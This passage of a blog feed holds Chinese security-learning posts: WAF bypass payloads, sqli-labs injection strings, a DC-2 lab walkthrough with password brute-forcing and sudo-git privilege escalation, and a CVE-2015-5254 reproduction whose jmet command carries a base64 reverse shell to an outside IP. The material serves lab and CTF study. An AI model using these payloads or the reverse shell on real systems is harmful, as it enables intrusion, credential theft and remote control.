title="利用path绕过"></a>利用path绕过</h3><p>可以通过截断和拼接来得到我们想要的来getshell<br>${PATH:5:1} //l<br>${PATH:2:1} //s<br>${PATH:5:1}${PATH:2:1} //拼接后是ls,执行命令<br>${PATH:5:1}s //拼接后是ls,执行命令 </p><h3 id="异或绕过"><a href="#异或绕过" class="headerlink" title="异或绕过"></a>异或绕过</h3><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">def</span> <span class="hljs-title function_">xor</span>():<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">128</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-number">128</span>):<br> result=i^j<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(i)+<span class="hljs-string">' ^ '</span>+<span class="hljs-built_in">chr</span>(j)+<span class="hljs-string">' == > '</span>+<span class="hljs-built_in">chr</span>(result)+<span class="hljs-string">" ASCII:"</span>+<span class="hljs-built_in">str</span>(result))<br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">"__main__"</span>:<br> xor()<br></code></pre></td></tr></table></figure><p>(‘GGGGGGG’^’7/7.)!(‘)();<br>其中’G’^’7’=p,’G’^’/‘=h…………依次类推拼出你想得到的令。</p><h3 id="取反绕过"><a href="#取反绕过" class="headerlink" title="取反绕过"></a>取反绕过</h3><p>在这里存在一个取反的问题,原因是隐藏字母、可还原性、URL 编码与二进制兼容性<br>取反是一种隐蔽技术,它将敏感字符转换为难以识别的形式,有效规避检测。而不取反会直接暴露敏感字符或使其更容易被解码检测。结合 urlencode() 等方法,按位取反可以提升绕过复杂度并增强隐匿性</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-string">'phpinfo'</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>例如phpinfo()就是:<br>(~’%8F%97%8F%96%91%99%90’)();</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-string">"system"</span>;<br><span class="hljs-variable">$b</span> = <span class="hljs-string">"ls /"</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$a</span>); <span class="hljs-comment">// 使用 ~$a,按位取反操作</span><br><span class="hljs-keyword">print</span>(<span class="hljs-string">"\n"</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$b</span>); <span class="hljs-comment">// 使用 ~$b,按位取反操作</span><br><span class="hljs-meta">?></span><br>payload=?wllm=(~%<span class="hljs-number">8</span>c%<span class="hljs-number">86</span>%<span class="hljs-number">8</span>c%<span class="hljs-number">8</span>b%<span class="hljs-number">9</span>a%<span class="hljs-number">92</span>)(~%<span class="hljs-number">9</span>C%<span class="hljs-number">9</span>E%<span class="hljs-number">8</span>B%DF%D0%<span class="hljs-number">99</span>%D5);<br></code></pre></td></tr></table></figure><h2 id="htaccess文件包含绕过"><a href="#htaccess文件包含绕过" class="headerlink" title=".htaccess文件包含绕过"></a>.htaccess文件包含绕过</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">//仅匹配1.jpg,也可以适用全部文件,解析为php</span><br><<span class="hljs-title class_">FilesMatch</span> <span class="hljs-string">"1.jpg"</span>><br><span class="hljs-title class_">SetHandler</span> application/x-httpd-php<br></<span class="hljs-title class_">FilesMatch</span>><br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="waf绕过总结"><a href="#waf绕过总结" class="headerlink" title="waf绕过总结"></a>waf绕过总结</h1><h2 id="ping"><a href="#ping" class="headerlink" titl</summary>
<category term="网络" scheme="https://fogpost.top/categories/%E7%BD%91%E7%BB%9C/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>web中可执行的xml文件jelly</title>
<link href="https://fogpost.top/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/"/>
<id>https://fogpost.top/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/</id>
<published>2024-12-11T06:03:29.000Z</published>
<updated>2024-12-11T06:21:06.424Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>好久没有写东西了,最近的ctf中有遇到一个jelly的题目,记录一下,题目是国成杯的web题,题目描述如下:</p><h2 id="Jelly简介"><a href="#Jelly简介" class="headerlink" title="Jelly简介"></a>Jelly简介</h2><p><a href="https://commons.apache.org/proper/commons-jelly/">Jelly的官方介绍</a></p><p>Jelly是Java Server Pages XML的简称,它是一种基于XML的脚本语言,用于在Java EE应用程序中生成动态内容。Jelly是一种基于XML的脚本语言,它允许开发人员使用XML标记来编写Java代码,从而实现动态内容的生成。</p><p>Jelly脚本通常包含在JSP文件中,通过在JSP文件中使用特殊的XML标记来执行Java代码。这些标记被称为Jelly标签,它们可以用于执行Java代码、访问Java对象、处理请求和响应等操作。</p><h2 id="如何实现并工作的"><a href="#如何实现并工作的" class="headerlink" title="如何实现并工作的"></a>如何实现并工作的</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-name">document</span> <span class="hljs-attr">time</span>=<span class="hljs-string">"${now}"</span>></span><br> Welcome ${user.name} to Jelly!<br><span class="hljs-tag"></<span class="hljs-name">document</span>></span><br></code></pre></td></tr></table></figure><p>原本有的脚本</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MyTask</span> {<br><br> <span class="hljs-comment">// 'doIt' method that does some function/task...</span><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> SomeException {<br> <span class="hljs-comment">// do something...</span><br> }<br><br> <span class="hljs-comment">// Properties, can be any type</span><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setX</span><span class="hljs-params">(<span class="hljs-type">int</span> x)</span> {<br> <span class="hljs-built_in">this</span>.x = x;<br> }<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setY</span><span class="hljs-params">(String y)</span> {<br> <span class="hljs-built_in">this</span>.y = y;<br> }<br>}<br></code></pre></td></tr></table></figure><p>调用脚本的jelly文件</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-name">j:jelly</span> <span class="hljs-attr">xmlns:j</span>=<span class="hljs-string">"jelly:core"</span> <span class="hljs-attr">xmlns:define</span>=<span class="hljs-string">"jelly:define"</span> <span class="hljs-attr">xmlns:my</span>=<span class="hljs-string">"myTagLib"</span>></span><br><br> <span class="hljs-tag"><<span class="hljs-name">define:taglib</span> <span class="hljs-attr">uri</span>=<span class="hljs-string">"myTagLib"</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">define:jellybean</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"foo"</span> <span class="hljs-attr">className</span>=<span class="hljs-string">"MyTask"</span>/></span><br> <span class="hljs-tag"></<span class="hljs-name">define:taglib</span>></span><br><br> Now lets use the new tag<br> <br> <span class="hljs-tag"><<span class="hljs-name">my:foo</span> <span class="hljs-attr">x</span>=<span class="hljs-string">"2"</span> <span class="hljs-attr">y</span>=<span class="hljs-string">"cheese"</span>/></span><br><br><span class="hljs-tag"></<span class="hljs-name">j:jelly</span>></span><br></code></pre></td></tr></table></figure><h2 id="继承功能"><a href="#继承功能" class="headerlink" title="继承功能"></a>继承功能</h2><p>jelly继承了JSTL,Ant,XML和Web_Service等,可以执行很多功能</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>好久没有写东西了,最近的ctf中有遇到一个jelly的题目,记录一下,题目是国成杯的web题,题目描述如下:</p>
<h2 id="Jel</summary>
<category term="网络" scheme="https://fogpost.top/categories/%E7%BD%91%E7%BB%9C/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>sqli10-20</title>
<link href="https://fogpost.top/2024/12/09/sqli10-20/"/>
<id>https://fogpost.top/2024/12/09/sqli10-20/</id>
<published>2024-12-09T11:45:38.000Z</published>
<updated>2025-01-11T02:40:33.275Z</updated>
<content type="html"><![CDATA[<h1 id="sqli11-20"><a href="#sqli11-20" class="headerlink" title="sqli11-20"></a>sqli11-20</h1><h2 id="11"><a href="#11" class="headerlink" title="11"></a>11</h2><p>输入1’出现报错显示,存在注入<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091947957.png" srcset="/img/loading.gif" lazyload><br>构造1’ or 1=1 #成功,1’union select 1,2#成功注入,同sqli1<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091949999.png" srcset="/img/loading.gif" lazyload></p><h2 id="12"><a href="#12" class="headerlink" title="12"></a>12</h2><p>为字符注入带引号,payload如下</p><blockquote><p>1”) or 1=1<br>1”) union select 1,2#</p></blockquote><h2 id="13-14"><a href="#13-14" class="headerlink" title="13,14"></a>13,14</h2><p>同上,引号和括号的区别</p><h2 id="15"><a href="#15" class="headerlink" title="15"></a>15</h2><p>同11bool盲注</p><h2 id="16"><a href="#16" class="headerlink" title="16"></a>16</h2><p>同12bool盲注</p><h2 id="17"><a href="#17" class="headerlink" title="17"></a>17</h2><p>重点 三种报错注入<br>extractvalue()报错注入,updatexml()报错注入和group by()报错注入<br>原理</p>]]></content>
<summary type="html"><h1 id="sqli11-20"><a href="#sqli11-20" class="headerlink" title="sqli11-20"></a>sqli11-20</h1><h2 id="11"><a href="#11" class="headerlink" </summary>
<category term="SQL" scheme="https://fogpost.top/categories/SQL/"/>
<category term="sql" scheme="https://fogpost.top/tags/sql/"/>
</entry>
<entry>
<title>DC-2</title>
<link href="https://fogpost.top/2024/11/28/DC-2/"/>
<id>https://fogpost.top/2024/11/28/DC-2/</id>
<published>2024-11-28T14:46:20.000Z</published>
<updated>2025-01-11T02:39:52.313Z</updated>
<content type="html"><![CDATA[<h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p>今天无所事事,又来搞靶机了,少搞这个,打算搞完DC系列再去加深学习一下,该学习学习eviden师傅的fofa教程了</p><p>本机ip : 192.168.56.135<br>目标ip : 192.168.56.147</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>nmap扫描本地ip,主机发现 -sP,是用于内网主机探测</p><blockquote><p>nmap -sP 192.168.56.135/24<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282257172.png" srcset="/img/loading.gif" lazyload><br>端口扫描<br>nmap -A -p- 192.168.56.147<br>对靶机ip的全端口详细扫描,发现两个应用分别是80和7744端口,http和ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282301709.png" srcset="/img/loading.gif" lazyload></p></blockquote><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><h3 id="修改hosts"><a href="#修改hosts" class="headerlink" title="修改hosts"></a>修改hosts</h3><p>访问对应的web站点,发现了域名跳转,需要我们更改hosts文件,将域名指向靶机ip<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282305798.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>vim /etc/hosts<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282308689.png" srcset="/img/loading.gif" lazyload><br>再次访问,进入主页面,发现flag,让我们爆破账户<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282309300.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282311344.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="wpscan爆破账户"><a href="#wpscan爆破账户" class="headerlink" title="wpscan爆破账户"></a>wpscan爆破账户</h3><p>登录网站后进行指纹识别,可以用whatweb或者wapper<br>,发现是由wordpress搭建的</p><blockquote><p>whatweb 192.168.56.147<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282312143.png" srcset="/img/loading.gif" lazyload><br>进行目录扫描,查找管理员页面,发现后台管理页面<br>dirb <a href="http://dc-2/">http://dc-2/</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282314018.png" srcset="/img/loading.gif" lazyload><br>似乎有个专门的wordpress工具wpscan,使用wpscan进行扫描,常用语句:<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> 扫描版本<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> –enumerate t 扫描主题<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> –enumerate p 扫描插件<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> –enumerate u 枚举用户 </p></blockquote><p>扫描版本发现版本为4.7.10,并利用wpscan枚举用户<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282322816.png" srcset="/img/loading.gif" lazyload><br>发现三个用户admin,jerry,tom<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282324996.png" srcset="/img/loading.gif" lazyload><br>根据flag1用cewl来生成字典,并进行爆破</p><blockquote><p>cewl <a href="http://dc-2/">http://dc-2/</a> > 1.txt 生成字典<br> Cewl(Custom Word List Generator)是一个用 Ruby 编写的应用程序,它可以爬取指定 URL 的内容,并根据用户设定的参数和选项,生成自定义的字典文件。这些字典文件可以用于密码猜测、暴力破解等攻击场景,从而提高渗透测试的成功率</p></blockquote><blockquote><p>wpscan –url <a href="http://dc-2/">http://dc-2</a> –passwords 1.txt 爆破密码,发现jerry和tom的密码 </p></blockquote><p>jerry/adipiscing<br>tom/parturient </p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282328174.png" srcset="/img/loading.gif" lazyload></p><p>尝试用jerry登录,发现flag2,并提示我们使用ssh登录<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330516.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330233.png" srcset="/img/loading.gif" lazyload></p><h3 id="ssh登录"><a href="#ssh登录" class="headerlink" title="ssh登录"></a>ssh登录</h3><blockquote><p>ssh <a href="mailto:tom@192.168.56.147">tom@192.168.56.147</a> -p 7744<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282333534.png" srcset="/img/loading.gif" lazyload><br>成功登录,发现在本地有flag3,但是只有vi可用,这个叫我们提权<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282335807.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="rbash提权"><a href="#rbash提权" class="headerlink" title="rbash提权"></a>rbash提权</h3><p>查看当前权限的软件</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282337342.png" srcset="/img/loading.gif" lazyload></p><p>利用echo来绕过rbash</p><blockquote><p>拿到jerry用户权限<br>export -p //查看环境变量<br>BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a<br>/bin/bash<br>export PATH=$PATH:/bin/ //添加环境变量<br>export PATH=$PATH:/usr/bin //添加环境变量</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282345295.png" srcset="/img/loading.gif" lazyload></p><p>查看可以使用root权限的命令</p><blockquote><p>find / -user root -perm -4000 -print 2>/dev/null</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282354377.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>su jerry 利用su获取jerry的权限,这时密码就可以用了<br>现在就可以越权查看jerry的falg4,提示我们用git提权</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282341436.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>sudo -l 发现可以用git软件</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282351395.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>sudo git help status </p></blockquote><p>查看git的命令,在配置页面的命令行输入<br>!/bin/sh,即可提权<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282357480.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282359962.png" srcset="/img/loading.gif" lazyload></p><p>##总结<br>至此已经完成,知识点有比如wpscan的用法,git的提权,rbash的绕过</p>]]></content>
<summary type="html"><h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p>今天无所事事,又来搞靶机了,少搞这个,打算搞完DC系列再去加深学习一下,该学习学习eviden师傅的fofa教程了</p>
</summary>
<category term="渗透测试" scheme="https://fogpost.top/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>CVE-2015-5254</title>
<link href="https://fogpost.top/2024/11/27/CVE-2015-5254/"/>
<id>https://fogpost.top/2024/11/27/CVE-2015-5254/</id>
<published>2024-11-27T09:57:58.000Z</published>
<updated>2024-11-27T11:24:08.322Z</updated>
<content type="html"><![CDATA[<h1 id="CVE-2015-5254"><a href="#CVE-2015-5254" class="headerlink" title="CVE-2015-5254"></a>CVE-2015-5254</h1><p>第一次写这个,玩一玩这个CVE,从老的开始学这个,这是一个反序列化漏洞<br>账户和密码默认admin/admin</p><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>漏洞编号:CVE-2015-5254<br>影响版本:Apache ActiveMQ 5.13.0之前5.x版本,<a href="https://www.cvedetails.com/cve/CVE-2015-5254/">https://www.cvedetails.com/cve/CVE-2015-5254/</a><br>漏洞产生原因:该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。</p><p>vulnP:110.41.22.24:8186<br>这是我自己的服务器,现在这个端口应该关了,我用完就关的,想玩的可以和我说哈,我给你开,就是个docker容器,打烂了都没用<br>hackIP:172.20.205.57</p><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>这个漏洞具体是两个端口61616工作端口,消息传递,8161是管理页面</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271814424.png" srcset="/img/loading.gif" lazyload><br>直接访问页面,发现是一个Apache ActiveMQ的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本。如果不知道版本可通过乱输入路径进行报错,或是使用云悉指纹识别进行版本检测.</p><blockquote><p>whatweb <a href="http://110.41.22.24:8161/">http://110.41.22.24:8161/</a> 可以查看版本</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271821474.png" srcset="/img/loading.gif" lazyload><br><a href="https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar">jmet</a></p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/success” -Yp ROME 110.41.22.24 61616<br>注意java版本要8及以下</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271853828.png" srcset="/img/loading.gif" lazyload><br>我们实现在管理员界面引入一个event队列,查看这个消息<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271859064.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411271900112.png" srcset="/img/loading.gif" lazyload><br>点击任意一条消息触发,发现已经执行了命令,touch /tmp/success<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271907776.png" srcset="/img/loading.gif" lazyload> </p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,YmFzaCAtaT4vZGV2L3RjcC8xOTIuMTY4LjE4LjI0NC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}” -Yp ROME 110.41.22.24 61616</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271911825.png" srcset="/img/loading.gif" lazyload></p><p>在执行完这个时候管理员处会获得新的消息,这时点击便会反弹我们的shell<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271909000.png" srcset="/img/loading.gif" lazyload><br>发现个事情,nc只能监听本地的接口,这个反弹shell有点问题由于我不是很会处理这个ip的转换,所以可能会有点问题,反弹shell也有点问题,看之后能不能在本地内网再来一次</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个CVE需要诱导管理员点击的同时,还需要再内网中攻击可以说是比较拉跨了,但是攻击方式又相对简单,很容易复现,虽然难点再exp的编写上,什么时候要看看这个jar包的内容</p>]]></content>
<summary type="html"><h1 id="CVE-2015-5254"><a href="#CVE-2015-5254" class="headerlink" title="CVE-2015-5254"></a>CVE-2015-5254</h1><p>第一次写这个,玩一玩这个CVE,从老的开始学这个,这</summary>
<category term="CVE" scheme="https://fogpost.top/categories/CVE/"/>
<category term="target" scheme="https://fogpost.top/tags/target/"/>
</entry>
<entry>
<title>web杂项</title>
<link href="https://fogpost.top/2024/11/27/web%E6%9D%82%E9%A1%B9/"/>
<id>https://fogpost.top/2024/11/27/web%E6%9D%82%E9%A1%B9/</id>
<published>2024-11-27T09:06:48.000Z</published>
<updated>2024-11-27T09:25:35.229Z</updated>
<content type="html"><![CDATA[<h1 id="搜索技巧"><a href="#搜索技巧" class="headerlink" title="搜索技巧"></a>搜索技巧</h1><ul><li>site:<a href="http://www.hao123/">www.hao123</a>. <ul><li>返回此目标站点被搜索引擎抓取收录的所有内容<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271724499.png" srcset="/img/loading.gif" lazyload></li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> keyword<ul><li>返回此目标站点被搜索引擎抓取收录的包含此关键词的所有页面</li><li>此处可以将关键词设定为网站后台,管理后台,密码修改,密码找回等</li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> inurl:admin.php<ul><li>返回目标站点的地址中包含admi<br> n.php的所有页面,可以使用admin.php/manage.php或者其他关键词来寻找关键功能页面</li></ul></li><li>link:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>返回所有包含目标站点链接的页面,其中包括其开发人员的个人博客,开发日志,或者开放这个站点的第三方公司,合作伙伴等</li></ul></li><li>related:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>返回所有与目标站点”相似”的页面,可能会包含一些通用程序的信息等</li></ul></li><li>intitle:”500 Internal Server Error” “server at”<ul><li>搜索出错的页面</li></ul></li><li>inurl:”nph-proxy.cgi” “Start browsing”<ul><li>搜索代理服务器</li></ul></li></ul>]]></content>
<summary type="html"><h1 id="搜索技巧"><a href="#搜索技巧" class="headerlink" title="搜索技巧"></a>搜索技巧</h1><ul>
<li>site:<a href="http://www.hao123/">www.hao123</a>. <ul>
</summary>
<category term="网络" scheme="https://fogpost.top/categories/%E7%BD%91%E7%BB%9C/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>sqli1-10练习</title>
<link href="https://fogpost.top/2024/11/24/sqli%E7%BB%83%E4%B9%A0/"/>
<id>https://fogpost.top/2024/11/24/sqli%E7%BB%83%E4%B9%A0/</id>
<published>2024-11-24T09:12:33.000Z</published>
<updated>2025-01-11T02:40:26.604Z</updated>
<content type="html"><![CDATA[<h1 id="sqli开头简介"><a href="#sqli开头简介" class="headerlink" title="sqli开头简介"></a>sqli开头简介</h1><p>sql注入我们可以理解为,通过构造恶意的输入,从而让程序执行我们想要执行的代码。所以我们需要了解源代码中的sql注入是什么样的语句什么样的过滤,但是在黑盒中我们无法了解代码,这便需要我们去有足够的知识积累,所以我打算将这个靶场打完,我要做sql领域大神🥰!</p><h1 id="前置知识点"><a href="#前置知识点" class="headerlink" title="前置知识点"></a>前置知识点</h1><p>联合查询特点:<br>1、要求多条查询语句的查询列数是一致的!<br>2、要求多条查询语句的查询的每一列的类型和顺序最好一致<br>3、union关键字默认去重,如果使用union all 可以包含重复项 </p><p>version():查看数据库版本<br>database():查看使用的数据库<br>user():查看当前用户<br>limit:limit子句分批来获取所有数据<br>group_concat():一次性获取所有的数据库信息</p><p>information_schema.tables:包含了数据库里所有的表<br>table_name:表名<br>table_schema:数据库名<br>column_name:字段名</p><p>–dbs:是查看所有的数据库<br>–tables:是查看所有的表<br>–columns:是查看表中所有的字段名<br>–dump:是查询哪个表的数据</p><h1 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>联合注入</h1><h2 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h2><ol><li>首先我们输入1,发现返回正常输入?id=1’,返回错误,说明存在单引号注入<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060247359.png" srcset="/img/loading.gif" lazyload></li><li>输入?id=1’ and ‘1’=’1,页面回显正常<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060248949.png" srcset="/img/loading.gif" lazyload></li><li>构造?id=1’ and ‘1’=’1’ order by 1–+ 页面回显正常<br>?id=1’ and ‘1’=’1’ order by 2–+ 页面回显正常<br>?id=1’ and ‘1’=’1’ order by 3–+ 页面回显正常<br>?id=1’ and ‘1’=’1’ order by 4–+ 出现报错界面<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060250107.png" srcset="/img/loading.gif" lazyload><br>所以我们了解到了数据库表只有三列,确定了字段数</li><li>构造联合查询?id=-1’ union select 1,2,3–+前面的id为-1,使前面的语句无效,用union查询是否有回显,发现2和3有回显<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060254643.png" srcset="/img/loading.gif" lazyload></li><li>构造?id=-1’ union select 1,database(),version()–+发现回显了数据库名称和版本信息<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060256922.png" srcset="/img/loading.gif" lazyload></li><li>构造?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+发现回显了数据库中的表名<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060259924.png" srcset="/img/loading.gif" lazyload></li><li>查询users的字段名?id=-1’ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’users’–+<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060302469.png" srcset="/img/loading.gif" lazyload></li><li>查询users表中的内容-1’ union select 1,2,group_concat(0x5c,username,0x5c,password) from users –+ 0x5c是反斜杠的十六进制,用于连接这两个库的数据内容<br>这个是手工注入的基本,大部分的注入都是围绕上面来优化的</li></ol><h2 id="sqlmap注入"><a href="#sqlmap注入" class="headerlink" title="sqlmap注入"></a>sqlmap注入</h2><p>sqlmap -u <a href="http://sql/sqli-labs-master/Less-1/id=1">http://sql/sqli-labs-master/Less-1/id=1</a> –dbs 查看对应的库<br>之后还会专门出一个sqlmap的教程,这里就不多说了</p><h1 id="bool盲注"><a href="#bool盲注" class="headerlink" title="bool盲注"></a>bool盲注</h1><p>?id=1’and length((select database()))>9–+<br>#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4<br>?id=1’and ascii(substr((select database()),1,1))=115–+<br>#substr(“78909”,1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。</p><p>?id=1’and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13–+<br>判断所有表名字符长度。<br>?id=1’and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99–+<br>逐一判断表名</p><p>?id=1’and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20–+<br>判断所有字段名的长度<br>?id=1’and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99–+<br>逐一判断字段名。</p><p>?id=1’ and length((select group_concat(username,password) from users))>109–+<br>判断字段内容长度<br>?id=1’ and ascii(substr((select group_concat(username,password) from users),1,1))>50–+<br>逐一检测内容。</p><h2 id="双查询注入"><a href="#双查询注入" class="headerlink" title="双查询注入"></a>双查询注入</h2><p><a 